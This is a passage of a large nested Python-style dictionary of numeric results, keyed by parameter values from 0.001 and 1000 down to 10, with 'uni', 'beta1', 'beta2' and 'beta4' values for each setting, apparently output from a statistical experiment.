0.7316807298861019, 'beta4': [0.0378678387401122, 1.244366535166112]}, 30: {'uni': 0.3386998692888889, 'beta1': 0.17154505920663973, 'beta2': 0.5992798646163214, 'beta4': [0.04917302283275163, 1.194126104878338]}, 20: {'uni': 0.39792219959430253, 'beta1': 0.2815541940784873, 'beta2': 0.747900941602933, 'beta4': [0.07551408684570264, 1.1705837460113553]}, 10: {'uni': 0.7085450643682678, 'beta1': 0.557285657062697, 'beta2': 0.7923738502247967, 'beta4': [0.12363410621488621, 1.1294702859709835]}}, 50: {1000: {'uni': 0.23388680552857205, 'beta1': 0.13013243901878963, 'beta2': 0.6069060830560372, 'beta4': [0.04117425543950271, 1.726982497483725]}, 750: {'uni': 0.3342542025053256, 'beta1': 0.09407677111881815, 'beta2': 0.6556558666300236, 'beta4': [0.04155147758863826, 1.6460758790319159]}, 500: {'uni': 0.2617400572920262, 'beta1': 0.08307527401736141, 'beta2': 0.913211655734957, 'beta4': [0.03865102052127645, 1.674268391357043]}, 400: {'uni': 0.2336538445225923, 'beta1': 0.0909012667517591, 'beta2': 0.6047353172470049, 'beta4': [0.040143198002047804, 1.6326149671287367]}, 300: {'uni': 0.23389869183851916, 'beta1': 0.08029673340728087, 'beta2': 0.7026588056699414, 'beta4': [0.03965227169879199, 1.5907846517974022]}, 200: {'uni': 0.24968943018733125, 'beta1': 0.08712704367432451, 'beta2': 0.6937256962543127, 'beta4': [0.03710393937932573, 1.5913617461424383]}, 150: {'uni': 0.2129598307100895, 'beta1': 0.08626171616487283, 'beta2': 0.6701299168130738, 'beta4': [0.04222205851236509, 1.4852236379671524]}, 100: {'uni': 0.294268810869127, 'beta1': 0.09392120576589265, 'beta2': 0.6588802567689228, 'beta4': [0.03189977184975169, 1.479025526521639]}, 75: {'uni': 0.20370496994007078, 'beta1': 0.08620506713922738, 'beta2': 0.8834851122792289, 'beta4': [0.0319486848668279, 1.5309361694540307]}, 50: {'uni': 0.26087340026827105, 'beta1': 0.08395940396348044, 'beta2': 0.9159051514594372, 'beta4': [0.039168451848731425, 1.383841945680644]}, 30: {'uni': 0.3325714781963125, 'beta1': 
0.15878413600643707, 'beta2': 0.8205263409406076, 'beta4': [0.04978681556769162, 1.3087756883985266]}, 20: {'uni': 0.42221900278176994, 'beta1': 0.22043433453119662, 'beta2': 0.7218703048306292, 'beta4': [0.07200305013037528, 1.2953604206103195]}, 10: {'uni': 0.7118146005654853, 'beta1': 0.5550103219492982, 'beta2': 0.8332806436554525, 'beta4': [0.11416986569421834, 1.192908742724074]}}, 30: {1000: {'uni': 0.39344771901594, 'beta1': 0.20706826216296173, 'beta2': 1.0378238557282666, 'beta4': [0.06402478683767453, 2.0914805409739223]}, 750: {'uni': 0.39030540148633164, 'beta1': 0.2198275946592076, 'beta2': 0.8834133901640486, 'beta4': [0.06307415740510106, 2.6350773192000805]}, 500: {'uni': 0.41888410414718413, 'beta1': 0.23122088686383846, 'beta2': 0.9340881005678076, 'beta4': [0.07167461301839322, 1.9609099596987858]}, 400: {'uni': 0.3377834589368441, 'beta1': 0.29762769921415416, 'beta2': 0.9285193846147385, 'beta4': [0.07390554519418496, 2.0702923109061]}, 300: {'uni': 0.6212256230961715, 'beta1': 0.2304534632287249, 'beta2': 0.9311442743499334, 'beta4': [0.0811370567517077, 1.8612702544609139]}, 200: {'uni': 0.40692874449521754, 'beta1': 0.2118536070891281, 'beta2': 0.8911524179154159, 'beta4': [0.068806307218875, 2.171137352139534]}, 150: {'uni': 0.39609796269299596, 'beta1': 0.20321160515473333, 'beta2': 0.9669393676536236, 'beta4': [0.07734188357043241, 2.0488754578525183]}, 100: {'uni': 0.47772960467285025, 'beta1': 0.23955521840544636, 'beta2': 1.093114783205816, 'beta4': [0.05647999347792319, 1.819279948595649]}, 75: {'uni': 0.49459915760994133, 'beta1': 0.7483228974591984, 'beta2': 1.0654241514219611, 'beta4': [0.05644331173725911, 1.8741005355316103]}, 50: {'uni': 0.4331535731141004, 'beta1': 0.23066294747587374, 'beta2': 1.045610584576763, 'beta4': [0.07252811484011165, 1.7866575621465575]}, 30: {'uni': 0.46993365210460936, 'beta1': 0.21062378826486575, 'beta2': 0.8982216898416053, 'beta4': [0.06060427283519371, 1.5645153212622234]}, 20: {'uni': 
0.4600252576437871, 'beta1': 0.2996794531583841, 'beta2': 1.0103881743096814, 'beta4': [0.07026605480971959, 1.4899469734392818]}, 10: {'uni': 0.6594503348248166, 'beta1': 0.6052142478169568, 'beta2': 0.9869014312815094, 'beta4': [0.13715957666261736, 1.4056236673782823]}}, 20: {1000: {'uni': 0.7214489274861283, 'beta1': 0.7109602540608293, 'beta2': 1.4891565362913541, 'beta4': [0.10993312172398585, 2.4810788188995145]}, 750: {'uni': 0.8741829459110129, 'beta1': 0.6454387408943474, 'beta2': 1.3967706446447408, 'beta4': [0.10004324893926338, 2.22889028771558]}, 500: {'uni': 0.7729649834330807, 'beta1': 0.6947447893498436, 'beta2': 1.6680333781865306, 'beta4': [0.09859672804685067, 2.3474935663134167]}, 400: {'uni': 0.8037659477540411, 'beta1': 0.7015941173311855, 'beta2': 1.2339541081317063, 'beta4': [0.09169952977240271, 2.3104115893066273]}, 300: {'uni': 0.7479852286057033, 'beta1': 0.5048924805863739, 'beta2': 1.2057595986711336, 'beta4': [0.09546498930528277, 2.5352386394449127]}, 200: {'uni': 0.6052348664014313, 'beta1': 0.6718924234071889, 'beta2': 1.365705564221558, 'beta4': [0.1041836789818561, 2.4944754731499743]}, 150: {'uni': 0.7688254742087617, 'beta1': 0.6261770101829472, 'beta2': 1.2884360012787288, 'beta4': [0.09317440733924622, 2.4938849555699267]}, 100: {'uni': 0.71957651254854, 'beta1': 0.783943623581165, 'beta2': 1.1750563274777475, 'beta4': [0.07906754869135671, 2.611732685956283]}, 75: {'uni': 0.7212663908569285, 'beta1': 0.7491438048083165, 'beta2': 1.278401781969983, 'beta4': [0.09482530961721904, 2.314169022600685]}, 50: {'uni': 0.6513534744070623, 'beta1': 0.4853982257852653, 'beta2': 1.2421157076252283, 'beta4': [0.09218054510962954, 2.1348513584225044]}, 30: {'uni': 0.6801650950857789, 'beta1': 0.4735199294026357, 'beta2': 1.1720266455494714, 'beta4': [0.08458494028243027, 1.9719368906208312]}, 20: {'uni': 0.7808504905420437, 'beta1': 0.8855164069561684, 'beta2': 1.687205161553261, 'beta4': [0.07993917695329548, 2.018904621369056]}, 10: 
{'uni': 0.9041310834722268, 'beta1': 0.7158435630266999, 'beta2': 1.441125642826424, 'beta4': [0.13713575135187742, 1.6132607653419426]}}, 10: {1000: {'uni': 2.291865093409438, 'beta1': 3.796391956407082, 'beta2': 3.1343136686310404, 'beta4': [0.16591181945616454, 3.906378172009109]}, 750: {'uni': 2.06579510564522, 'beta1': 2.171132303701963, 'beta2': 2.43170413233102, 'beta4': [0.1714184982061991, 3.769544241401269]}, 500: {'uni': 1.7971825445298801, 'beta1': 2.8958816024514253, 'beta2': 2.3653595606869926, 'beta4': [0.20241339836195862, 4.077588626656164]}, 400: {'uni': 2.9424629521344974, 'beta1': 2.175911759881622, 'beta2': 2.604315847454542, 'beta4': [0.16266017066247487, 3.922604522260496]}, 300: {'uni': 1.9501226945273409, 'beta1': 3.782840007260135, 'beta2': 2.4106789863691453, 'beta4': [0.19330939984065848, 3.9702653485690873]}, 200: {'uni': 1.9928797910462663, 'beta1': 2.544676640580035, 'beta2': 2.818092333476372, 'beta4': [0.19321946623916747, 4.280267345101734]}, 150: {'uni': 2.6518203037821433, 'beta1': 2.6301937163774207, 'beta2': 2.662964550514325, 'beta4': [0.21170321149282043, 3.556982875367642]}, 100: {'uni': 2.899996349799425, 'beta1': 4.938592490365132, 'beta2': 3.2946845207767494, 'beta4': [0.20970024710748755, 4.918212312376091]}, 75: {'uni': 2.2712541486054723, 'beta1': 3.6115973476133356, 'beta2': 2.662909535043666, 'beta4': [0.19697867293373564, 3.6544730606284994]}, 50: {'uni': 1.8507652388899076, 'beta1': 2.535719173511266, 'beta2': 3.4567115555436216, 'beta4': [0.18431463594573702, 3.8942424792269956]}, 30: {'uni': 2.259855972095226, 'beta1': 2.507575552707849, 'beta2': 3.206096601185821, 'beta4': [0.1930477272227709, 2.9865306063349633]}, 20: {'uni': 3.323417704391435, 'beta1': 2.0495630344146014, 'beta2': 3.725865413632031, 'beta4': [0.1591708091618429, 4.0725701537088925]}, 10: {'uni': 2.683590243185979, 'beta1': 2.5526577443663645, 'beta2': 3.2041752255912126, 'beta4': [0.15035404637826302, 3.3085549636814515]}}}, 0.001: {1000: 
{1000: {'uni': 0.013537109538788296, 'beta1': 0.0004418669610901742, 'beta2': 0.2697608014805966, 'beta4': [0.0020188419600072316, 1.0765969581860098]}, 750: {'uni': 0.015518737693553651, 'beta1': 0.0004474752413131278, 'beta2': 0.3049834574567616, 'beta4': [0.002928484716195256, 1.0723749161682772]}, 500: {'uni': 0.025492576200161737, 'beta1': 0.00126278309841898, 'beta2': 0.2947895955099542, 'beta4': [0.004139147290479029, 1.06380419459373]}, 400: {'uni': 0.027388914557718014, 'beta1': 0.0017858676691235038, 'beta2': 0.2940695060349895, 'beta4': [0.004940725691007278, 1.0646782930881278]}, 300: {'uni': 0.043679103650868634, 'beta1': 0.004146600715111695, 'beta2': 0.3221074594010006, 'beta4': [0.0058809014285304325, 1.05171679158162]}, 200: {'uni': 0.055850905773996797, 'beta1': 0.012286663899209264, 'beta2': 0.35495235902886635, 'beta4': [0.011747346538206456, 1.0444923375059274]}, 150: {'uni': 0.07571408794730279, 'beta1': 0.00999545083178083, 'beta2': 0.39339731864243854, 'beta4': [0.015654464010031004, 1.04119667050509]}, 100: {'uni': 0.12878417183859997, 'beta1': 0.02319251025329732, 'beta2': 0.42206919367400175, 'beta4': [0.02605154363623979, 1.032808860624055]}, 75: {'uni': 0.17671912769998804, 'beta1': 0.04651753009023005, 'beta2': 0.48290210890860846, 'beta4': [0.02542438975055508, 1.028587880357103]}, 50: {'uni': 0.2080017791039395, 'beta1': 0.09510052489274758, 'beta2': 0.5532686352849299, 'beta4': [0.04866446156086449, 1.024036289107115]}, 30: {'uni': 0.37174873647872525, 'beta1': 0.1763556838455918, 'beta2': 0.6073687185809629, 'beta4': [0.06065616138133705, 1.0204732817389364]}, 20: {'uni': 0.4706009281641317, 'beta1': 0.4172241498005575, 'beta2': 0.7267012642157473, 'beta4': [0.0878371580829132, 1.016042382017103]}, 10: {'uni': 0.6884462251280654, 'beta1': 0.6504310410056453, 'beta2': 0.8578616568198645, 'beta4': [0.17123050769669146, 1.0114288240221012]}}, 750: {1000: {'uni': 0.014032662653447249, 'beta1': 0.0004197603947433533, 'beta2': 
0.3224155552733178, 'beta4': [0.0025877927402001293, 1.0992758471396775]}, 750: {'uni': 0.017656930734368415, 'beta1': 0.0006179708996352925, 'beta2': 0.32112678688815993, 'beta4': [0.0027850509560516695, 1.0896392012982408]}, 500: {'uni': 0.022487140809604803, 'beta1': 0.0015712340706562924, 'beta2': 0.306535854228737, 'beta4': [0.0036538931964645595, 1.0768857039245323]}, 400: {'uni': 0.02931711450909471, 'beta1': 0.0015953956989447965, 'beta2': 0.2940021793382613, 'beta4': [0.004512162746165237, 1.0787914212103158]}, 300: {'uni': 0.03797549613105823, 'beta1': 0.004238318530411427, 'beta2': 0.31851063220054193, 'beta4': [0.0070433871318897785, 1.0709324943449523]}, 200: {'uni': 0.0672635192185687, 'beta1': 0.01475666235800533, 'beta2': 0.36095052393035215, 'beta4': [0.010745748507439314, 1.060093775811335]}, 150: {'uni': 0.0782012161107774, 'beta1': 0.012171034981107647, 'beta2': 0.3989466015618546, 'beta4': [0.012275235549252002, 1.055035316087489]}, 100: {'uni': 0.1111671462254427, 'beta1': 0.03504805392658513, 'beta2': 0.4399388718825932, 'beta4': [0.023290484838746617, 1.0414289777455785]}, 75: {'uni': 0.1467229116392003, 'beta1': 0.03154826354242117, 'beta2': 0.46545805237237575, 'beta4': [0.027567286039267083, 1.0413459531642508]}, 50: {'uni': 0.23242853631519125, 'beta1': 0.08764681410239905, 'beta2': 0.5282997805478701, 'beta4': [0.043790203869254855, 1.0312059461852012]}, 30: {'uni': 0.33478090270484767, 'beta1': 0.19986746017417012, 'beta2': 0.6464281529320948, 'beta4': [0.06216169944957162, 1.024300820754563]}, 20: {'uni': 0.46625228103566874, 'beta1': 0.3352913882162956, 'beta2': 0.7546236949727922, 'beta4': [0.07899091129224035, 1.021045206512229]}, 10: {'uni': 0.7532461209078295, 'beta1': 0.6554865690700844, 'beta2': 0.8689473621561907, 'beta4': [0.15450554655293974, 1.0158420905223018]}}, 500: {1000: {'uni': 0.02208336031576062, 'beta1': 0.0012806271939282098, 'beta2': 0.30491792281941166, 'beta4': [0.004154369009543563, 1.1291796536550491]}, 750: 
{'uni': 0.0249788378175696, 'beta1': 0.0010797670073452693, 'beta2': 0.34597268013437205, 'beta4': [0.0035547566741248944, 1.145887504602334]}, 500: {'uni': 0.03156864097576366, 'beta1': 0.001878931149848406, 'beta2': 0.33555105256994455, 'beta4': [0.004045741246069753, 1.1111524120461513]}, 400: {'uni': 0.02964039049766577, 'beta1': 0.0028752475332747426, 'beta2': 0.3189895492462362, 'beta4': [0.004475496924442904, 1.0985004462671362]}, 300: {'uni': 0.04054286140926675, 'beta1': 0.0030530447014601707, 'beta2': 0.33602501575095534, 'beta4': [0.005807153069867216, 1.089948008106302]}, 200: {'uni': 0.06368154738558036, 'beta1': 0.009413172181526356, 'beta2': 0.35093318039296945, 'beta4': [0.010128392991850291, 1.0749455354962245]}, 150: {'uni': 0.08560979711191868, 'beta1': 0.01814400620954622, 'beta2': 0.3817391631518634, 'beta4': [0.012693849833483756, 1.0766956230098896]}, 100: {'uni': 0.11065760228804478, 'beta1': 0.031931499364947796, 'beta2': 0.42393584933219425, 'beta4': [0.019711926476868896, 1.074086162181026]}, 75: {'uni': 0.13814860825841252, 'beta1': 0.047161838474747725, 'beta2': 0.461454606486388, 'beta4': [0.026718709086169346, 1.0529062226093644]}, 50: {'uni': 0.2924729124618689, 'beta1': 0.08356191139025354, 'beta2': 0.5416545481337098, 'beta4': [0.048513803361591896, 1.047349564419994]}, 30: {'uni': 0.38994864567008714, 'beta1': 0.21557372764244884, 'beta2': 0.6108965479787709, 'beta4': [0.059368500830894747, 1.0431355252713714]}, 20: {'uni': 0.42393809596014487, 'beta1': 0.38044506197760547, 'beta2': 0.7206816523302737, 'beta4': [0.08428835003718527, 1.0344086832398853]}, 10: {'uni': 0.7381591918995368, 'beta1': 0.6448622984694605, 'beta2': 0.8475866078699237, 'beta4': [0.16783106781496734, 1.0239303365728043]}}, 400: {1000: {'uni': 0.027326134080412047, 'beta1': 0.0015489118053178246, 'beta2': 0.3257531838269524, 'beta4': [0.004363329218823618, 1.157047980101011]}, 750: {'uni': 0.03269613683176431, 'beta1': 0.00237347642961547, 'beta2': 
0.3765112398224541, 'beta4': [0.0044084255091659495, 1.1515364706106115]}, 500: {'uni': 0.02829267608816353, 'beta1': 0.002113478462779276, 'beta2': 0.3699445800604303, 'beta4': [0.005062501969303326, 1.128564031724105]}, 400: {'uni': 0.02982284964668319, 'beta1': 0.0018557251431091941, 'beta2': 0.30418237177038493, 'beta4': [0.0055468098705524094, 1.124759552937044]}, 300: {'uni': 0.03633810592372252, 'beta1': 0.003329752124641255, 'beta2': 0.34503158449761623, 'beta4': [0.00764574873689276, 1.1336601117649365]}, 200: {'uni': 0.0618643630393636, 'beta1': 0.006239455946425697, 'beta2': 0.3893580111719922, 'beta4': [0.008740016065982145, 1.0944415138600063]}, 150: {'uni': 0.08290995558988935, 'beta1': 0.01485769035028909, 'beta2': 0.3895851178723324, 'beta4': [0.014543995199215603, 1.0911947267214124]}, 100: {'uni': 0.12733784071357707, 'beta1': 0.041792640842624705, 'beta2': 0.4170065697291755, 'beta4': [0.019429522082070005, 1.0836887858094717]}, 75: {'uni': 0.1639703758168183, 'beta1': 0.05486987789272019, 'beta2': 0.5020845124417863, 'beta4': [0.02454441092459795, 1.0759262870830304]}, 50: {'uni': 0.2228830962075744, 'beta1': 0.11564754038475192, 'beta2': 0.5212091861747059, 'beta4': [0.047308183312444844, 1.0664568311962506]}, 30: {'uni': 0.3351992860790609, 'beta1': 0.16191267408494092, 'beta2': 0.5937982222349889, 'beta4': [0.06569858803208886, 1.0505472791656445]}, 20: {'uni': 0.5450729893841108, 'beta1': 0.43098366097308594, 'beta2': 0.6960946521774166, 'beta4': [0.08068269657512149, 1.0390693056594573]}, 10: {'uni': 0.7538652232296545, 'beta1': 0.7065202410569426, 'beta2': 0.8402242155683589, 'beta4': [0.15938925995624306, 1.0282263365830497]}}, 300: {1000: {'uni': 0.03623155105790878, 'beta1': 0.0025522247554552115, 'beta2': 0.3467467563959175, 'beta4': [0.007027836875807712, 1.1966502929456388]}, 750: {'uni': 0.0313950547463441, 'beta1': 0.004694441216264605, 'beta2': 0.36722656659770836, 'beta4': [0.0058771168613729555, 1.2034970232663906]}, 500: 
{'uni': 0.03539489610897603, 'beta1': 0.002663434080378617, 'beta2': 0.36331720497958425, 'beta4': [0.0064603241919073545, 1.1620579992997444]}, 400: {'uni': 0.0351254278473425, 'beta1': 0.00461414127398557, 'beta2': 0.3277459584398935, 'beta4': [0.0068608047998020005, 1.1704067166884702]}, 300: {'uni': 0.03980018699125466, 'beta1': 0.0054655033491287745, 'beta2': 0.3584428215881965, 'beta4': [0.005844562969263582, 1.1451011317868725]}, 200: {'uni': 0.05520695836413316, 'beta1': 0.00648381893317757, 'beta2': 0.38261363002766086, 'beta4': [0.009080285192231337, 1.1358137946469902]}, 150: {'uni': 0.09585002315832265, 'beta1': 0.014666160900098158, 'beta2': 0.3965763572228682, 'beta4': [0.01591317956737841, 1.1209589256111785]}, 100: {'uni': 0.1127142711948545, 'beta1': 0.02363531926273754, 'beta2': 0.45212575945962213, 'beta4': [0.02048277594290429, 1.1031644566986183]}, 75: {'uni': 0.14797467282265053, 'beta1': 0.03809387628580308, 'beta2': 0.4591848632040782, 'beta4': [0.03180981588767595, 1.1063373896373865]}, 50: {'uni': 0.2254379372771143, 'beta1': 0.09345713137258113, 'beta2': 0.5001164965271707, 'beta4': [0.04261601974244967, 1.0797165368273711]}, 30: {'uni': 0.40093684330112, 'beta1': 0.18938608352195094, 'beta2': 0.665032310636, 'beta4': [0.06012863762712923, 1.0658667444693248]}, 20: {'uni': 0.4942285112700853, 'beta1': 0.2885547182303252, 'beta2': 0.6595791693752406, 'beta4': [0.08745746042355958, 1.0536053485041785]}, 10: {'uni': 0.7190345596593238, 'beta1': 0.6651211105848184, 'beta2': 0.826925122122391, 'beta4': [0.16051646670948755, 1.0471478131384455]}}, 200: {1000: {'uni': 0.060057793651372704, 'beta1': 0.006187938996693969, 'beta2': 0.36736477572277093, 'beta4': [0.009293227645305487, 1.267681265906244]}, 750: {'uni': 0.06046594852805391, 'beta1': 0.006509051778350212, 'beta2': 0.41313052787178256, 'beta4': [0.01142723790937598, 1.2309014344313365]}, 500: {'uni': 0.0740362005188402, 'beta1': 0.00849682830778454, 'beta2': 0.3818697598614397, 'beta4': 
[0.00942075185210953, 1.277912461458182]}, 400: {'uni': 0.04917940985082775, 'beta1': 0.0073151839179716694, 'beta2': 0.37681354718921994, 'beta4': [0.009762298223416793, 1.2374277805357872]}, 300: {'uni': 0.0509887818241694, 'beta1': 0.004721389267464698, 'beta2': 0.4137259989095081, 'beta4': [0.010709445552100886, 1.2195842345664258]}, 200: {'uni': 0.06092018198260521, 'beta1': 0.008126211311259117, 'beta2': 0.41377607585033904, 'beta4': [0.012552773795295888, 1.210814650871189]}, 150: {'uni': 0.08320861100830386, 'beta1': 0.010652599194381862, 'beta2': 0.410588921859252, 'beta4': [0.011377755543899413, 1.1605558296237972]}, 100: {'uni': 0.10647538233235196, 'beta1': 0.02675525864005623, 'beta2': 0.45027686602574685, 'beta4': [0.018774675358622005, 1.1425517213205887]}, 75: {'uni': 0.15075826113503984, 'beta1': 0.03812861351502258, 'beta2': 0.4821830000786633, 'beta4': [0.02588845495636567, 1.1460284931167872]}, 50: {'uni': 0.20748454934236824, 'beta1': 0.07956559814853244, 'beta2': 0.5318809243191449, 'beta4': [0.03400241330970483, 1.131144969956103]}, 30: {'uni': 0.39005891840591755, 'beta1': 0.23508768413194275, 'beta2': 0.604195019511204, 'beta4': [0.07300462632536944, 1.0968699306871237]}, 20: {'uni': 0.47961991346108024, 'beta1': 0.3378509422322994, 'beta2': 0.6949090618591872, 'beta4': [0.08435933637998484, 1.0861750985584178]}, 10: {'uni': 0.7493592487162126, 'beta1': 0.7082252135351613, 'beta2': 0.8233197764550338, 'beta4': [0.16360988217538464, 1.0590739421875983]}}, 150: {1000: {'uni': 0.07246512795587667, 'beta1': 0.00940509489365912, 'beta2': 0.3834121832843376, 'beta4': [0.012061154345627774, 1.346345368105395]}, 750: {'uni': 0.08333214979418102, 'beta1': 0.012019314225734089, 'beta2': 0.41354718085794745, 'beta4': [0.013617336072865511, 1.317803333864672]}, 500: {'uni': 0.07223808071808703, 'beta1': 0.013444843438640032, 'beta2': 0.500497170757918, 'beta4': [0.013732312336221736, 1.3566135025043116]}, 400: {'uni': 0.07412227863180197, 'beta1': 
0.009173025234347465, 'beta2': 0.5218918631188576, 'beta4': [0.010646990872949938, 1.3275623997460937]}, 300: {'uni': 0.06027828499856449, 'beta1': 0.008588769483821677, 'beta2': 0.43303765653591175, 'beta4': [0.011001496083177107, 1.2709377624732103]}, 200: {'uni': 0.07740533698799229, 'beta1': 0.01596227776300425, 'beta2': 0.4393860829917456, 'beta4': [0.013707242813425027, 1.235336706709078]}, 150: {'uni': 0.09469289988283666, 'beta1': 0.018010566018472236, 'beta2': 0.46689138360128024, 'beta4': [0.015442744929322542, 1.22737373023355]}, 100: {'uni': 0.10537401955613016, 'beta1': 0.02559635095907498, 'beta2': 0.4483188526069417, 'beta4': [0.020984796579724598, 1.1917347765643078]}, 75: {'uni': 0.1741885047544234, 'beta1': 0.05029710897697464, 'beta2': 0.4832427754379396, 'beta4': [0.02508555719013275, 1.1877236315076742]}, 50: {'uni': 0.23513358008851837, 'beta1': 0.08821603551377359, 'beta2': 0.5410204067376275, 'beta4': [0.03945996719545313, 1.154311026803482]}, 30: {'uni': 0.32655423356767815, 'beta1': 0.23627137526479217, 'beta2': 0.612345924047393, 'beta4': [0.06279287244508759, 1.127521379517458]}, 20: {'uni': 0.43138609640559733, 'beta1': 0.36249312001735073, 'beta2': 0.6879736777963187, 'beta4': [0.11914662239936859, 1.1278478336983744]}, 10: {'uni': 0.7425459718118043, 'beta1': 0.6837968299663986, 'beta2': 0.8665605066074531, 'beta4': [0.1876384389463847, 1.083397954154307]}}, 100: {1000: {'uni': 0.1487676605580423, 'beta1': 0.02437792836645245, 'beta2': 0.49427790334163363, 'beta4': [0.01703482937216448, 1.399548399765302]}, 750: {'uni': 0.11310232265204254, 'beta1': 0.02524996032593586, 'beta2': 0.5217627256964408, 'beta4': [0.01698165245717892, 1.4406554008355783]}, 500: {'uni': 0.11717410083094586, 'beta1': 0.02618543909344974, 'beta2': 0.5383596952242804, 'beta4': [0.023983523561589164, 1.3929126361512172]}, 400: {'uni': 0.119738193458416, 'beta1': 0.02505658785977393, 'beta2': 0.5984167205074813, 'beta4': [0.01926970844980976, 
1.4014605002976324]}, 300: {'uni': 0.12233230352897319, 'beta1': 0.030570949763671123, 'beta2': 0.5770761352544695, 'beta4': [0.019784253795192344, 1.4359356389798974]}, 200: {'uni': 0.12207409086081243, 'beta1': 0.02347263628756829, 'beta2': 0.5760897628554611, 'beta4': [0.019990281670087366, 1.3745371518250655]}, 150: {'uni': 0.10542026853254463, 'beta1': 0.02953081474765129, 'beta2': 0.5703573600080448, 'beta4': [0.01916862292541901, 1.2965599971106665]}, 100: {'uni': 0.12606340736638602, 'beta1': 0.029241858812173283, 'beta2': 0.520085462363208, 'beta4': [0.021680149967017056, 1.3380882439868846]}, 75: {'uni': 0.15289116139614062, 'beta1': 0.046818551423756204, 'beta2': 0.5234533249147212, 'beta4': [0.030541975508426033, 1.2737285592668153]}, 50: {'uni': 0.22295673863255383, 'beta1': 0.0777043578096471, 'beta2': 0.5277287922461552, 'beta4': [0.03463272718442295, 1.2507855959253786]}, 30: {'uni': 0.322701566594298, 'beta1': 0.20209878886640079, 'beta2': 0.6446393363434055, 'beta4': [0.057809443205279955, 1.183476927699967]}, 20: {'uni': 0.4881509697552908, 'beta1': 0.32634375809351596, 'beta2': 0.6555377865749321, 'beta4': [0.09881280421760813, 1.1859881340445586]}, 10: {'uni': 0.7185909063724639, 'beta1': 0.6708907363360799, 'beta2': 0.8168268424612932, 'beta4': [0.1552377656555602, 1.121004193526685]}}, 75: {1000: {'uni': 0.20283838067373647, 'beta1': 0.048429921987961456, 'beta2': 0.5254186618618247, 'beta4': [0.02716958040457032, 1.5310324208557173]}, 750: {'uni': 0.13649456208891103, 'beta1': 0.05990815130918355, 'beta2': 0.6143499171511568, 'beta4': [0.025247761507755824, 1.6218068004006065]}, 500: {'uni': 0.17357469505108555, 'beta1': 0.04911574923950298, 'beta2': 0.5392298327482756, 'beta4': [0.025313183659280477, 1.5098847201105141]}, 400: {'uni': 0.1696292678007163, 'beta1': 0.04567710550047028, 'beta2': 0.531791431252953, 'beta4': [0.02843317204287415, 1.511767668283802]}, 300: {'uni': 0.15649352627564092, 'beta1': 0.052458117800853014, 'beta2': 
0.6238230721412571, 'beta4': [0.024980744864881454, 1.448139383334922]}, 200: {'uni': 0.16000482751565392, 'beta1': 0.04812942180105504, 'beta2': 0.6848305198014162, 'beta4': [0.026321896909384607, 1.3985133907539185]}, 150: {'uni': 0.21512892236445738, 'beta1': 0.04170656196537403, 'beta2': 0.6484101556394571, 'beta4': [0.028292107396516844, 1.4960535034185667]}, 100: {'uni': 0.17047052520864803, 'beta1': 0.04434589905934036, 'beta2': 0.6147353576676836, 'beta4': [0.031896789192913104, 1.395203205943251]}, 75: {'uni': 0.15498526288207984, 'beta1': 0.05584692512943298, 'beta2': 0.6237541924317974, 'beta4': [0.02517618697832332, 1.3245769159326284]}, 50: {'uni': 0.26311823368421094, 'beta1': 0.08632237956112145, 'beta2': 0.5711379680106714, 'beta4': [0.04746092000571327, 1.3617429879333032]}, 30: {'uni': 0.36091090034892204, 'beta1': 0.18600456221710257, 'beta2': 0.6048666597688582, 'beta4': [0.061077535669381317, 1.2677185233169856]}, 20: {'uni': 0.41610718889687526, 'beta1': 0.3481216835860471, 'beta2': 0.6823292535355998, 'beta4': [0.09228201110020866, 1.2376222120042897]}, 10: {'uni': 0.7381983047748464, 'beta1': 0.6931366409956315, 'beta2': 0.8379903854497059, 'beta4': [0.16766375232596248, 1.2030815682204685]}}, 50: {1000: {'uni': 0.30730495204502717, 'beta1': 0.12683774226991987, 'beta2': 0.758295652904777, 'beta4': [0.033995273995958114, 1.6538716994158296]}, 750: {'uni': 0.2748268412061488, 'beta1': 0.08382717056992495, 'beta2': 0.7404913706816707, 'beta4': [0.04268820403356018, 1.6928867889354913]}, 500: {'uni': 0.21407720814314096, 'beta1': 0.10363951921535253, 'beta2': 0.659551205149009, 'beta4': [0.05049658923489535, 1.6751311937416606]}, 400: {'uni': 0.24125970025430582, 'beta1': 0.08123246944687809, 'beta2': 0.8628937525700389, 'beta4': [0.05894238702800365, 1.5997778968369727]}, 300: {'uni': 0.22589766382811063, 'beta1': 0.09942885166527134, 'beta2': 0.7532476283115479, 'beta4': [0.04082381032197537, 1.6868673631889013]}, 200: {'uni': 
0.2591850579641999, 'beta1': 0.08728773319618409, 'beta2': 0.9235193570611554, 'beta4': [0.04818549496425245, 1.6588257461274114]}, 150: {'uni': 0.2556506895317946, 'beta1': 0.0750813441904301, 'beta2': 0.7289289852709729, 'beta4': [0.03313187544593835, 1.6253850040214513]}, 100: {'uni': 0.22229774262566845, 'beta1': 0.0811448635916027, 'beta2': 0.9098362902991676, 'beta4': [0.03530222422489702, 1.5256474346104436]}, 75: {'uni': 0.2521735586774331, 'beta1': 0.09746447495069399, 'beta2': 0.7259112629043855, 'beta4': [0.03833690135899138, 1.5441263026950591]}, 50: {'uni': 0.2616930090766834, 'beta1': 0.14123441320732333, 'beta2': 0.7728043037823017, 'beta4': [0.03330514564613822, 1.4984785036564114]}, 30: {'uni': 0.3777369219546949, 'beta1': 0.3181138500578289, 'beta2': 0.8227214613274908, 'beta4': [0.0647326450741752, 1.4293026049607784]}, 20: {'uni': 0.43054757894409096, 'beta1': 0.3589568856858122, 'beta2': 0.7092031874212259, 'beta4': [0.08521969621604755, 1.3592456219745106]}, 10: {'uni': 0.7193676569866309, 'beta1': 0.654002177380139, 'beta2': 1.0551759887242254, 'beta4': [0.17405948907032012, 1.291814832800615]}}, 30: {1000: {'uni': 0.39051571889875925, 'beta1': 0.3225844223634567, 'beta2': 0.9035558894765073, 'beta4': [0.07704160115380267, 2.227381034694318]}, 750: {'uni': 0.5419984090402282, 'beta1': 0.21755538971134444, 'beta2': 0.899954144980397, 'beta4': [0.07004875190766695, 2.1477522364679]}, 500: {'uni': 0.4412079869283692, 'beta1': 0.22030317510188066, 'beta2': 0.9843616821005815, 'beta4': [0.07667967917770555, 1.9841297602015278]}, 400: {'uni': 0.5283629457513818, 'beta1': 0.2598066986086734, 'beta2': 0.8073163609237236, 'beta4': [0.06868678999251733, 2.072822244613063]}, 300: {'uni': 0.40263354028046217, 'beta1': 0.3001142440813251, 'beta2': 1.0046350150005576, 'beta4': [0.06557265592267082, 1.9586311124743965]}, 200: {'uni': 0.48134354695262954, 'beta1': 0.2392909536632273, 'beta2': 0.8273194635401119, 'beta4': [0.0581293469539461, 
